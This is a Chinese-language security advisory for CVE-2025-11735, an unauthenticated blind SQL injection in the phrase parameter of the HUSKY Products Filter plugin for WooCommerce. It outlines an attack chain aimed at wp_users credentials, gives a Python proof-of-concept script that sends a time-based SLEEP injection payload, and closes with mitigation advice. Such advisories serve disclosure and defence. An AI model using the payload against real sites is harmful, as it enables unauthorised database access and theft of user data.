CVE-2025-11735 WordPress WooCommerce产品过滤器SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11735

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

HUSKY – Products Filter Professional for WooCommerce

漏洞概述

CVE-2025-11735是WordPress插件HUSKY – Products Filter Professional for WooCommerce中的一个高危安全漏洞。该插件是一款专业的WooCommerce产品过滤解决方案，广泛应用于WordPress电商网站中。漏洞源于插件在处理用户输入的phrase参数时，未能对用户提供的参数进行充分的转义处理，同时在构建SQL查询时缺乏足够的预处理机制。攻击者无需任何认证凭证，即可通过构造恶意Payload注入到现有的SQL查询语句中，从而实现对数据库的未授权访问。此漏洞的CVSS评分为7.5，属于高危级别，攻击复杂度低，无需用户交互即可发起攻击。由于该插件在WooCommerce生态中使用量较大，漏洞可能影响大量电商网站的安全，导致用户敏感数据、订单信息、产品数据等被泄露。攻击者利用此漏洞可以绕过身份验证机制，直接从数据库中提取敏感信息，对网站运营和用户隐私构成严重威胁。

技术细节

该漏洞为典型的Blind SQL Injection（盲注SQL注入）类型。漏洞存在于插件的ext/by_text_2/index.php文件第164行附近的代码中。攻击者通过HTTP请求中的phrase参数注入恶意SQL代码片段。由于插件直接将该参数值拼接到SQL查询语句中而未进行充分的输入验证和转义，攻击者可以在原有查询基础上追加UNION SELECT等SQL语句。盲注的特点在于数据库错误信息不会直接返回给攻击者，但攻击者可以通过观察页面响应时间或内容差异来推断注入结果。攻击者通常使用自动化工具如sqlmap构造时间盲注或布尔盲注Payload，逐步提取数据库中的敏感信息。由于漏洞存在于所有版本直到1.3.7.1，攻击者可以针对未及时更新的网站发起攻击，窃取wp_users表中的用户凭证、订单数据、支付信息等敏感内容。

攻击链分析

STEP 1

步骤1

攻击者识别使用HUSKY Products Filter插件的WordPress网站

STEP 2

步骤2

访问包含phrase参数的AJAX端点（如admin-ajax.php）

STEP 3

步骤3

构造恶意SQL注入Payload注入到phrase参数中

STEP 4

步骤4

通过时间盲注或布尔盲注技术逐步提取数据库信息

STEP 5

步骤5

获取wp_users表中的用户凭证、订单数据等敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11735 PoC - Blind SQL Injection
# Target: HUSKY Products Filter Professional for WooCommerce
# Vulnerability: phrase parameter SQL Injection

def test_vulnerability(url):
    """Test if target is vulnerable to CVE-2025-11735"""
    
    # Normal request
    normal_payload = {
        'phrase': 'test'
    }
    
    # Time-based blind SQL injection payload (MySQL)
    # Using SLEEP() to confirm SQL injection vulnerability
    sqli_payload = {
        'phrase': "test' AND (SELECT * FROM (SELECT SLEEP(5))test) AND '1'='1"
    }
    
    print(f"[*] Testing target: {url}")
    
    try:
        # Send normal request
        print("[*] Sending normal request...")
        start = requests.get(url, params=normal_payload, timeout=10)
        
        # Send malicious request
        print("[*] Sending SQL injection payload...")
        import time
        start_time = time.time()
        response = requests.get(url, params=sqli_payload, timeout=30)
        elapsed = time.time() - start_time
        
        if elapsed >= 5:
            print(f"[+] VULNERABLE! Response delayed by {elapsed:.2f} seconds")
            print("[+] Target is affected by CVE-2025-11735")
            return True
        else:
            print(f"[-] Not vulnerable or target not affected")
            return False
            
    except requests.exceptions.Timeout:
        print("[+] VULNERABLE! Request timed out (expected behavior)")
        return True
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11735-poc.py <target_url>")
        print("Example: python cve-2025-11735-poc.py http://example.com/wp-admin/admin-ajax.php")
        sys.exit(1)
    
    target_url = sys.argv[1]
    test_vulnerability(target_url)

影响范围

HUSKY Products Filter Professional for WooCommerce <= 1.3.7.1

防御指南

临时缓解措施

如果无法立即升级插件，可以临时禁用HUSKY Products Filter插件，或通过Web应用防火墙规则拦截包含特殊SQL字符（如单引号、UNION、SELECT等）的phrase参数请求。同时建议在Wordfence等安全插件中启用SQL注入防护规则，对AJAX端点实施额外监控。